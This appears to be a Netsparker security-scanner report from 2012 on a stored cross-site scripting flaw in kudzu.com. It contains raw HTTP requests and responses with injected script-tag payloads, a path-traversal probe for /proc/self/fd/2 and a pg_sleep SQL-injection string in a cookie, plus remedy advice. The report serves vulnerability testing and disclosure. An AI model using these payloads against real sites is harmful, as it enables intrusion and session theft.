User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012|plumber+electrician&Woodston%2C+KS+67675|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012; ERROR=; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:46 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:46 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012|plumber+electrician&Woodston%2C+KS+67675|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:46 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002B)%3C/script%3E&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002B)%3C/script%3E&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002B)%3C/script%3E&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
..
Permanent Cross-site Scripting

Permanent Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /controller.jsp

/controller.jsp CONFIRMED

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=../../../../..

Injection URL

http://www.kudzu.com/controller.jsp?N=0&searchVal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000029)%3C/script%3E&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a

Injection Request

GET /controller.jsp?N=0&searchVal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000029)%3C/script%3E&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012|plumber+electrician&Woodston%2C+KS+67675; ERROR=; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Identification Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=../../../../../../../../../../proc/self/fd/2&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&Woodston%2C+KS+67675|plumber+electrician&New+York%2C+NY+10012|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012; ERROR=; locations="ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT; Path=/,RECENT_SEARCH=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012|plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html


Identification Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:27 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:27 GMT; Path=/,RECENT_SEARCH=plumber+electrician&Woodston%2C+KS+67675|plumber+electrician&New+York%2C+NY+10012|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:27 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in Woodston, KS - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in Woodston, KS? Get reviews, maps & directions and more for Woodston, KS plumber electrician on Kudzu.com.">
<meta name="keywords" content="Woodston KS plumber electrician, Woodston KS plumber electrician reviews, Best plumber electrician in Woodston KS, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="67675"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=67675&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="Woodston, KS 67675" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 1</b> of <b>1</b> for
